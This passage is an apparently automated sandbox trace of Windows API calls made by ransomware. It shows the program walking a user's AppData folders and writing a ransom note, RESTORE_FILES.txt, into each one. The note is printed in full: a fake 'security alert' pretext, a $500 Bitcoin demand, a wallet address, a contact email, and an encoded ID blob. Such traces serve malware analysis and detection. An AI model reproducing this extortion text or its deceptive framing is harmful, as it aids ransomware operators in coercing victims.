lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.946] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.946] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\.") returned 67 [0089.946] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.946] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.946] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.946] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.946] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.946] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.946] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.946] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\..") returned 68 [0089.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.946] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.946] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.946] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\RESTORE_FILES.txt") returned 83 [0089.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ime12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.947] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.947] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.948] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.948] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.948] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.948] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.948] CloseHandle (hObject=0xd8) returned 1 [0089.948] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="Windows") returned -1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files") returned -1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files (x86)") returned -1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="$Recycle.bin") returned 1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="System Volume Information") returned -1 [0089.948] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12") returned 66 [0089.948] lstrcmpW (lpString1="IMJP12", lpString2=".") returned 1 [0089.948] lstrcmpW (lpString1="IMJP12", lpString2="..") returned 1 [0089.948] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*") returned 68 [0089.948] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.949] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.949] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.949] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.949] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.949] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.949] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\.") returned 68 [0089.949] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.949] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.949] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.949] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.949] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.949] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.949] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.949] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\..") returned 69 [0089.949] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.949] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.949] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.949] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.949] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\RESTORE_FILES.txt") returned 84 [0089.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.950] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.950] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.951] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.951] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.951] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.951] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.951] CloseHandle (hObject=0xd8) returned 1 [0089.952] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="Windows") returned -1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files") returned -1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files (x86)") returned -1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="$Recycle.bin") returned 1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="System Volume Information") returned -1 [0089.952] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1") returned 67 [0089.952] lstrcmpW (lpString1="IMJP8_1", lpString2=".") returned 1 [0089.952] lstrcmpW (lpString1="IMJP8_1", lpString2="..") returned 1 [0089.952] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*") returned 69 [0089.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.952] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.952] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.952] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.952] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.952] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.952] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\.") returned 69 [0089.953] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.953] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.953] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.953] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.953] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.953] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.953] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.953] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\..") returned 70 [0089.953] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.953] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.953] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.953] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.953] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt") returned 85 [0089.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp8_1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.954] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.954] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.954] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.954] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.955] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.955] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.955] CloseHandle (hObject=0xd8) returned 1 [0089.955] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="Windows") returned -1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files") returned -1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files (x86)") returned -1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="$Recycle.bin") returned 1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="System Volume Information") returned -1 [0089.955] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0") returned 67 [0089.955] lstrcmpW (lpString1="IMJP9_0", lpString2=".") returned 1 [0089.955] lstrcmpW (lpString1="IMJP9_0", lpString2="..") returned 1 [0089.955] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*") returned 69 [0089.955] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.955] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.956] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.956] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.956] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.956] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.956] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\.") returned 69 [0089.956] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.956] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.956] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.956] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.956] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.956] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.956] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.956] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\..") returned 70 [0089.956] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.956] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.956] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.956] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.956] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt") returned 85 [0089.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.957] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.957] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.957] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.957] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.958] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.958] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.958] CloseHandle (hObject=0xd8) returned 1 [0089.958] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.958] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0089.958] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0089.958] lstrcmpiW 